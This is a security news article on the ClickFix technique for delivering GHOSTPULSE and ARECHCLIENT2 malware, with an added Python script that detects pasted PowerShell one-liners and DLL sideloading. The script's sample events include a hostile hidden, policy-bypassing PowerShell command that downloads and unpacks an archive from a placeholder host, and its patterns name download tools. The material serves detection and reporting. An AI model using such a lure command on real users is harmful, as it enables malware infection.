ClickFix technique widely used to deliver multi-stage malware campaigns


Malicious actors are increasingly leveraging a sophisticated social engineering tactic known as ‘ClickFix’ to deliver multi-stage malware campaigns targeting users across various sectors, according to a new report from Elastic Security Labs.

ClickFix, first observed last year, tricks victims into copying and pasting malicious PowerShell that results in malware execution. Once triggered, the commands initiate a complex infection chain designed to evade detection and compromise systems.

Elastic’s latest telemetry reveals that ClickFix is increasingly being used to distribute updated variants of the GHOSTPULSE loader (aka HIJACKLOADER or IDATLOADER), which in turn downloads the ARECHCLIENT2 remote access trojan (RAT) and infostealer.

In recent campaigns analyzed by Elastic, the infection starts with the ClickFix lure, leading users to launch a PowerShell script that downloads a ZIP file named ComponentStyle.zip. Inside are components for a DLL sideloading attack, including a benign executable (Crysta_X64.exe) and a malicious DLL (DllXDownloadManager.dll). These are used to decrypt and load additional files, including Heeschamjet.rc and Shonomteak.bxi, which contain encrypted payloads and configuration data.

The GHOSTPULSE loader, which has been active since 2023 and regularly updated with new evasion techniques, deploys an intermediate .NET loader, which, in turn, loads ARECHCLIENT2 directly into memory using reflective techniques. This multi-layered strategy helps bypass antivirus detection and ensures stealthy data exfiltration.
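To make the detection angle of the chain above concrete, here is an added Python triage script written for this page (it is not Elastic's detection logic and not part of the report). It scores Windows process-creation events for the traits of a pasted ClickFix one-liner (a user-facing parent process such as the Run dialog or a browser, hidden window, execution-policy bypass, a web download, an archive unpack or an encoded command) and separately flags the DLL-sideloading shape of an executable loading a DLL from its own directory outside the trusted install locations. The event fields, indicator list, threshold, domain and sample events are constructed assumptions; the only values taken from the article are the file names ComponentStyle.zip, Crysta_X64.exe and DllXDownloadManager.dll.

```python
"""Heuristic triage of Windows process-creation events for ClickFix-style
activity. Added example for this article, not Elastic's detection logic;
event format, indicators, threshold and sample events are constructed."""
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str   # raw command line as logged


# Parents that imply a human pasted the command (Run dialog, browser) rather
# than an installer or scheduled task launching it. Assumed list.
USER_PASTE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Command-line traits typical of pasted one-liners; each hit adds one point.
INDICATORS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I),
    "policy_bypass": re.compile(r"-e(p|xecutionpolicy)?\s+bypass\b", re.I),
    "web_download": re.compile(
        r"\b(invoke-webrequest|iwr|irm|invoke-restmethod|downloadfile|downloadstring|curl|wget)\b", re.I),
    "archive_unpack": re.compile(r"(expand-archive|\.zip\b)", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
}
ALERT_THRESHOLD = 3  # assumed: a user-launched shell alone (2 points) is not enough


def score_event(ev: ProcessEvent) -> tuple[int, list[str]]:
    """Return (score, matched indicator names) for one process-creation event."""
    if ntpath.basename(ev.image).lower() not in POWERSHELL_IMAGES:
        return 0, []
    hits, score = [], 0
    if ntpath.basename(ev.parent_image).lower() in USER_PASTE_PARENTS:
        hits.append("user_paste_parent")
        score += 2
    for name, pattern in INDICATORS.items():
        if pattern.search(ev.command_line):
            hits.append(name)
            score += 1
    return score, hits


def triage(events: list[ProcessEvent]) -> list[dict]:
    """Return one finding per event whose score reaches ALERT_THRESHOLD."""
    findings = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= ALERT_THRESHOLD:
            findings.append({"parent": ntpath.basename(ev.parent_image),
                             "score": score, "hits": hits})
    return findings


# Directories from which an installed executable normally loads its DLLs (assumed).
TRUSTED_DIR_PREFIXES = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")


def is_sideload_candidate(image: str, loaded_dll: str) -> bool:
    """True when an executable loads a DLL from its own directory and that
    directory lies outside the trusted install locations, e.g. a freshly
    unpacked folder under the user's profile (the Crysta_X64.exe /
    DllXDownloadManager.dll pairing described in the article)."""
    exe_dir = ntpath.dirname(image).lower() + "\\"
    dll_dir = ntpath.dirname(loaded_dll).lower() + "\\"
    return exe_dir == dll_dir and not exe_dir.startswith(TRUSTED_DIR_PREFIXES)


# Constructed sample events (not real telemetry); the domain is a placeholder.
SAMPLE_EVENTS = [
    # 1: pasted into the Run dialog, downloads and unpacks the archive -> alert
    ProcessEvent(
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line=(r'powershell -w hidden -ep bypass -c "iwr https://lure.example.invalid/ComponentStyle.zip '
                      r'-OutFile $env:TEMP\ComponentStyle.zip; Expand-Archive $env:TEMP\ComponentStyle.zip $env:TEMP\cs"'),
    ),
    # 2: user simply opened PowerShell from the Start menu -> no alert
    ProcessEvent(
        parent_image=r"C:\Windows\explorer.exe",
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        command_line="powershell.exe",
    ),
    # 3: scheduled maintenance script launched by the service host -> no alert
    ProcessEvent(
        parent_image=r"C:\Windows\System32\svchost.exe",
        image=r"C:\Program Files\PowerShell\7\pwsh.exe",
        command_line=r"pwsh -NoProfile -File C:\Scripts\cleanup.ps1",
    ),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The score weights the parent process heavily because the defining feature of ClickFix is that the victim, not a dropper, launches the shell; the individual command-line traits are common enough in administration that none of them alone should page an analyst. The sideload check is deliberately narrow (same directory, outside trusted paths) so it can be run over image-load telemetry without matching ordinary application DLLs.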

First seen in 2019, ARECHCLIENT2 (aka SECTOPRAT) is capable of harvesting sensitive data, executing commands remotely, and maintaining persistent access.

Elastic’s infrastructure analysis indicates that the threat actors have been using a compromised digital advertising agency’s server to host and distribute the malicious content. The campaign also relies on a constantly shifting network of command-and-control (C2) servers, with over 120 unique servers across various autonomous systems identified in the past seven months alone.


18 June 2025